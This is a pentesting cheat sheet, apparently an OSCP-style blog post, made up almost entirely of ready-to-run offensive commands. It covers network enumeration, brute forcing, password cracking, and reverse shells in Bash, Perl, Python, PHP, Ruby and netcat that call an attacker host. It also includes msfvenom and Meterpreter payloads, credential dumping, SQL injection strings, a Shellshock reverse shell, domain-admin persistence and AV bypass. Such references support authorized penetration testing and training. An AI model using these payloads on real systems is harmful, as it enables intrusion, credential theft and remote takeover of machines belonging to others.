Pentesting Cheat Sheet
1-EnumerationGeneral Enumeration
FTP Enumeration (21)
SSH (22)
SMTP Enumeration (25)
Finger Enumeration (79)
Web Enumeration (80/443)
Pop3 (110)
RPCBind (111)
SMB\RPC Enumeration (139/445)
SNMP Enumeration (161)
Oracle (1521)
Mysql Enumeration (3306)
DNS Zone Transfers
Mounting File Shares
Fingerprinting
Exploit Research
Compiling Exploits
Packet Inspection
Password Cracking
Bruteforcing
2-Shells & Reverse Shells
SUID C Shells
TTY Shell
Spawn Ruby Shell
Netcat
Telnet Reverse Shell
PHP
Bash
Perl
3-Meterpreter
Windows reverse meterpreter payload
Windows VNC Meterpreter payload
Linux Reverse Meterpreter payload
Meterpreter Cheat Sheet
Meterpreter Payloads
Binaries
Web Payloads
Scripting Payloads
Shellcode
Handlers
4-Powershell-Privilege Escalation
Linux
Windows
5-Command Injection
File Traverse
Test HTTP options using curl
Upload file using CURL to website with PUT option available
Transfer file
Activate shell file
6-SQLInjections
Injections
SQLMap
Miscellaneous
Tunneling
AV Bypass
Web hosts
Php Meterpreter Shell
Reverse shell using interpreters
Shellshock
7-Resources & Links
Windows Privilege Escalation
SQL & Apache Log paths
Recon
Cheat Sheets (Includes scripts)
Meterpreter Stuff
Proxy Chaining
Huge collection of common commands and scripts as well as general pentest info
Scripts
Pentester Bookmarks, huge collection of blogs, forums, and resources
Pentest Checklist
OSCP Writeups, blogs, and notes
*****************
1-Enumeration
nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1
Verbose, syn, all ports, all scripts, no ping
nmap -v -sS -A -T4 x.x.x.x
Verbose, SYN Stealth, Version info, and scripts against services.
nmap –script smb-check-vulns.nse –script-args=unsafe=1 -p445 [host]
Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover
Extracting Live IPs from Nmap Scan
nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips
Simple Port Knocking
for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 1.1.1.1; done
netdiscover -r 192.168.1.0/24
FTP Enumeration (21):
nmap –script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1
SSH (22):
ssh INSERTIPADDRESS 22
SMTP Enumeration (25):
nmap –script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
nc -nvv INSERTIPADDRESS 25
SMTP
smtp-user-enum -U /usr/share/wordlists/names.txt -t $TARGET -m 150
Bypassing File Upload Restrictions
file.php -> file.jpg
file.php -> file.php.jpg
file.asp -> file.asp;.jpg
file.gif (contains php code, but starts with string GIF/GIF98)
00%
file.jpg with php backdoor in exif (see below)
.jpg -> proxy intercept -> rename to .php
telnet INSERTIPADDRESS 25
Finger Enumeration (79):
Download script and run it with a wordlist: http://pentestmonkey.net/tools/user-enumeration/finger-user-enum
Web Enumeration (80/443):
dirbuster (GUI)
dirb http://10.0.0.1/
nikto –h 10.0.0.1
Pop3 (110):
telnet INSERTIPADDRESS 110
USER [username]
PASS [password]
To login
LIST
To list messages
RETR [message number]
Retrieve message
QUIT
quits
RPCBind (111):
rpcinfo –p x.x.x.x
SMB\RPC Enumeration (139/445):
enum4linux –a 10.0.0.1
nbtscan x.x.x.x
Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
py 192.168.XXX.XXX 500 50000 dict.txt
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
nmap IPADDR --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse
smbclient -L //INSERTIPADDRESS/
List open shares
smbclient //INSERTIPADDRESS/ipc$ -U john
SNMP Enumeration (161):
snmpwalk -c public -v1 10.0.0.0
snmpcheck -t 192.168.1.X -c public
onesixtyone -c names -i hosts
nmap -sT -p 161 192.168.X.X -oG snmp_results.txt
snmpenum -t 192.168.1.X
SNMP
# Windows User Accounts
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.25
# Windows Running Programs
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.4.2.1.2
# Windows Hostname
snmpwalk -c public -v1 $TARGET .1.3.6.1.2.1.1.5
# Windows Share Information
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.3.1.1
# Windows Share Information
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.27
# Windows TCP Ports
snmpwalk -c public -v1 $TARGET4 1.3.6.1.2.1.6.13.1.3
# Software Name
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.6.3.1.2
# brute-force community strings
onesixtyone -i snmp-ips.txt -c community.txt
snmp-check $TARGET
Oracle (1521):
tnscmd10g version -h INSERTIPADDRESS
tnscmd10g status -h INSERTIPADDRESS
Mysql Enumeration (3306):
nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
DNS Zone Transfers:
nslookup -> set type=any -> ls -d blah.com
dig axfr blah.com @ns1.blah.com
This one works the best in my experience
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
DNS lookups, Zone Transfers & Brute-Force
whois domain.com
dig {a|txt|ns|mx} domain.com
dig {a|txt|ns|mx} domain.com @ns1.domain.com
host -t {a|txt|ns|mx} megacorpone.com
host -a megacorpone.com
host -l megacorpone.com ns1.megacorpone.com
dnsrecon -d megacorpone.com -t axfr @ns2.megacorpone.com
dnsenum domain.com
nslookup -> set type=any -> ls -d domain.com
for sub in $(cat subdomains.txt);do host $sub.domain.com|grep "has.address";done
nc -v $TARGET 80
telnet $TARGET 80
curl -vX $TARGET
Kerberos Enumeration
# users
nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'
HTTP Brute-Force & Vulnerability Scanning
target=10.0.0.1; gobuster -u http://$target -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 150 -l | tee $target-gobuster
target=10.0.0.1; nikto -h http://$target:80 | tee $target-nikto
target=10.0.0.1; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum
RPC / NetBios / SMB
rpcinfo -p $TARGET
nbtscan $TARGET
#list shares
smbclient -L //$TARGET -U ""
# null session
rpcclient -U "" $TARGET
smbclient -L //$TARGET
enum4linux $TARGET
NFS Exported Shares
List NFS exported shares. If 'rw,no_root_squash' is present, upload and execute sid-shell
showmount -e 192.168.110.102
chown root:root sid-shell; chmod +s sid-shell
Mounting File Share
showmount -e IPADDR
mount 192.168.1.1:/vol/share /mnt/nfs -nolock
mounts the share to /mnt/nfs without locking it
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs
Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
Mount a Windows share on Windows from the command line
apt-get install smb4k –y
Install smb4k on Kali, useful Linux GUI for browsing SMB shares
Fingerprinting: Basic versioning / finger printing via displayed banner
nc -v 192.168.1.1 25
telnet 192.168.1.1 25
Exploit Research
searchsploit windows 2003 | grep -i local
Search exploit-db for exploit, in this example windows 2003 + local esc
Compiling Exploits
gcc -o exploit exploit.c
Compile C code, add –m32 after ‘gcc’ for compiling 32 bit code on 64 bit Linux
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
Compile windows .exe on Linux
Packet Inspection:
tcpdump tcp port 80 -w output.pcap -i eth0
tcpdump for port 80 on interface eth0, outputs to output.pcap
Password Cracking
hash-identifier [hash]
john hashes.txt
hashcat -m 500 -a 0 -o output.txt –remove hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 dump.txt -o output.txt --remove -a 3 ?u?l?l?d?d?d?d
Brute force crack for NTLM hashes with an uppercase, lowercase, lowercase, and 4 digit mask
List of hash types and examples for hashcat https://hashcat.net/wiki/doku.php?id=example_hashes
https://hashkiller.co.uk has a good repo of already cracked MD5 and NTLM hashes
Bruteforcing:
hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin
hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt IPADDR PROTOCOL
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp –V
Hydra SMTP Brute force
Shells & Reverse Shells
SUID C Shells
bin/bash:
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
bin/sh:
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
TTY Shell:
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh –i
execute('/bin/sh')
LUA
!sh
Privilege Escalation via nmap
:!bash
Privilege escalation via vi
Fully Interactive TTY
In reverse shell
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
In Attacker console
stty -a
stty raw -echo
fg
In reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
Spawn Ruby Shell
exec "/bin/sh"
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d
Netcat
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
Telnet Reverse Shell
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
PHP
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6)
Bash
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done
# or: while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
Perl
exec "/bin/sh";
perl —e 'exec "/bin/sh";'
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Windows
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Windows
Meterpreter-
Windows reverse meterpreter payload
set payload windows/meterpreter/reverse_tcp
Windows reverse tcp payload
Windows VNC Meterpreter payload
set payload windows/vncinject/reverse_tcp
Meterpreter Windows VNC Payload
set ViewOnly false
Linux Reverse Meterpreter payload
set payload linux/meterpreter/reverse_tcp
Meterpreter Linux Reverse Payload
Meterpreter Cheat Sheet
upload file c:\\windows
Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp
Meterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmp
Meterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exe
Meterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -c
Creates new channel with cmd shell
ps
Meterpreter show processes
shell
Meterpreter get shell on the target
getsystem
Meterpreter attempts priviledge escalation the target
hashdump
Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first)
portfwd add –l 3389 –p 3389 –r target
Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target
Meterpreter delete port forward
use exploit/windows/local/bypassuac
Bypass UAC on Windows 7 + Set target + arch, x86/64
use auxiliary/scanner/http/dir_scanner
Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan
Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login
Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version
Metasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_login
Metasploit Oracle Login Module
use exploit/multi/script/web_delivery
Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell
Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer
Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload
Metasploit MSSQL payload
run post/windows/gather/win_privs
Metasploit show privileges of current user
use post/windows/gather/credentials/gpp
Metasploit grab GPP saved passwords
load kiwi
creds_all
Metasploit load Mimikatz/kiwi and get creds
run post/windows/gather/local_admin_search_enum
Idenitfy other machines that the supplied domain user has administrative access to
set AUTORUNSCRIPT post/windows/manage/migrate
Meterpreter Payloads
msfvenom –l
List options
Binaries
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php
PHP
set payload php/meterpreter/reverse_tcp
Listener
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
WAR
Scripting Payloads
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Python
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Bash
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Perl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z
An example is:
msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f > exploit.extension
Powershell
Execution Bypass
Set-ExecutionPolicy Unrestricted
./file.ps1
Import-Module script.psm1
Invoke-FunctionThatIsIntheModule
iex(new-object system.net.webclient).downloadstring(“file:///C:\examplefile.ps1”)
Powershell.exe blocked
Use ‘not powershell’ https://github.com/Ben0xA/nps
Persistence
net user username "password" /ADD
net group "Domain Admins" %username% /DOMAIN /ADD
Gather NTDS.dit file
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
Privilege Escalation
Linux:
Find Binaries that will execute as the owner
find / -perm -u=s -type f 2>/dev/null
Find binaries that will execute as the group
find / -perm -g=s -type f 2>/dev/null
Find sticky-bit binaries
find / -perm -1000 -type d 2>/dev/null
If Python is executable as root
python2.7 -c "import pty;pty.spawn('/bin/sh');"
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://github.com/pentestmonkey/unix-privesc-check
Windows:
https://github.com/pentestmonkey/windows-privesc-check
http://www.fuzzysecurity.com/tutorials/16.html
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
Command Injection
File Traverse:
website.com/file.php[?path=/]
Test HTTP options using curl:
curl -vX OPTIONS [website]
Upload file using CURL to website with PUT option available
curl --upload-file shell.php --url http://192.168.218.139/test/shell.php --http1.0
Transfer file (Try temp directory if not writable)(wget -O tells it where to store):
?path=/; wget http://IPADDRESS:8000/FILENAME.EXTENTION;
Activate shell file:
; php -f filelocation.php;
SQLInjections-
Common Injections for Login Forms:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1—
SQLMap
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
Automated sqlmap scan
sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"
Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump Scan url for union + error based injection with mysql backend and use a
random user agent + database dump
sqlmap -o -u "http://meh.com/form/" –forms
sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users –dump
sqlmap dump and crack hashes for table users on database-name.
sqlmap --flush session
Flushes the session
sqlmap -p user --technique=B
Attempts to exploit the “user” field using boolean technique.
sqlmap -r <captured request>
Capture a request via Burp Suite, save it to a file, and use this command to let sqlmap automate everything. Add –os-shell at the end to pop a shell if possible.
Miscellaneous
NTLMRelayx.py using mitm6
This will take captured credentials via IPv6 spoofing using mitm6 and relay them to a target via ntlmrelayx.py. It requires ntlmrelayx.py and mitm6 to be installed already.
mitm6 -d <domain.local>
First, start mitm6 and specify the domain you’re spoofing on with ‘-d domain.name’
ntlmrelayx.py -6 -wh 192.168.1.1 -t smb://192.168.1.2 -l ~/tmp/
-6 specifies ipv6, -wh specifies where the WPAD file is hosted at (your IP usually). -t specifies the target, or destination where the credentials will be relayed. -l is to where to store the loot.
Name your terminal whatever you want
This small script will name your terminal whatever you pass as an argument to it. It helps organizing with multiple terminals open. Thanks Ben!
#!bin/bash
echo -ne "\033]0;${1}\007"
Tunneling:
sshuttle is an awesome tunneling tool that does all the hard work for you. It gets rid of the need for proxy chains. What this command does is tunnels traffic through 10.0.0.1 and makes a route for all traffic destined for 10.10.10.0/24 through your sshuttle tunnel.
sshuttle -r root@10.0.0.1 10.10.10.0/24
AV Bypass:
wine hyperion.exe ../backdoor.exe ../backdoor_mutation.exe
wine and hyperion need to be installed.
Web hosts
python -m SimpleHTTPServer 80
Basic HTTP Server. Will list the directory it’s started in.
service apache2 start
Starts Apache web server. Place files in /var/www/html to be able to ‘wget’ them.
Php Meterpreter Shell (Remove Guard bit)
msfvenom -p php/meterpreter/reverse_tcp LHOST=????????? LPORT=6000 R > phpmeterpreter.php
Netcat
Listener: nc -lvp <PORT>
Listen verbosely on a port.
Target:nc -e /bin/bash listeneripaddress listenerport
or ncat -v -l -p 7777 -e /bin/bash
Host: cat happy.txt | ncat -v -l -p 5555 Target: ncat localhost 5555 > happy_copy.txt
Download file via ncat
Reverse shell using interpreters (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
python -c python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
Shellshock
curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x 192.168.28.167:PORT -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.28.169/1234 0>&1" 192.168.28.167/cgi-bin/status
ssh username@IPADDRESS '() { :;}; /bin/bash'
Shellshock over SSH
CrackMapExec
crackmapexec smb 10.0.0.1/24 -u administrator -p 'password' --local-auth --sam
Spray the network with local login credentials then dump SAM contents
crackmapexec smb 10.0.0.1/24 -u administrator -H <hash> --local-auth --lsa
Pass the hash network-wide, local login, dump LSA contents
crackmapexec smb 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test
Requires Empire Restful API to be running. It will spray supply credentials and pop an empire agent on any successful login. Read more here
Resources & Links
Windows Privilege Escalation
http://www.fuzzysecurity.com/tutorials/16.html
https://toshellandback.com/2015/11/24/ms-priv-esc/
SQL & Apache Log paths
http://www.itninja.com/blog/view/mysql-and-apache-profile-log-path-locations
Recon
https://bitvijays.github.io/blog/2015/04/09/learning-from-the-field-intelligence-gathering/
Cheat Sheets (Includes scripts):
http://pentestmonkey.net/
https://highon.coffee/blog/cheat-sheet/
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
Meterpreter Stuff
http://netsec.ws/?p=331
Proxy Chaining
apt-get install sshuttle
https://github.com/sshuttle/sshuttle
https://github.com/rofl0r/proxychains-ng
https://www.offensive-security.com/metasploit-unleashed/proxytunnels/
Huge collection of common commands and scripts as well as general pentest info
https://bobloblaw.gitbooks.io/security/content/
Scripts
https://github.com/rebootuser/LinEnum
https://github.com/mzet-/linux-exploit-suggester
https://github.com/azmatt/windowsEnum
https://github.com/leebaird/discover
https://nmap.org/nsedoc/
Pentester Bookmarks, huge collection of blogs, forums, and resources.
https://code.google.com/archive/p/pentest-bookmarks/wikis/BookmarksList.wiki
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Pentest Checklist
http://mateustymbu.xpg.uol.com.br/Bibliography/Pentest_Checklist.pdf
Pentesting Workflow
https://workflowy.com/s/FgBl.6qcAQUUqWM
OSCP Writeups, blogs, and notes:
https://xapax.github.io/blog/2017/01/14/OSCP.html
http://www.securitysift.com/offsec-pwb-oscp/
https://netsecfocus.com/topic/32/oscp-like-vulnhub-vms
https://blog.propriacausa.dewp-content/uploads/2016/07/oscp_notes.html
https://localhost.exposed/path-to-oscp/
https://www.reddit.com/r/netsecstudents/comments/5i00w6/my_experience_with_the_oscp/
https://naterobb.blogspot.com/2017/02/my-experience-with-oscp-to-kick-off-my.html
http://www.securitysift.com/offsec-pwb-oscp/
Comments
Post a Comment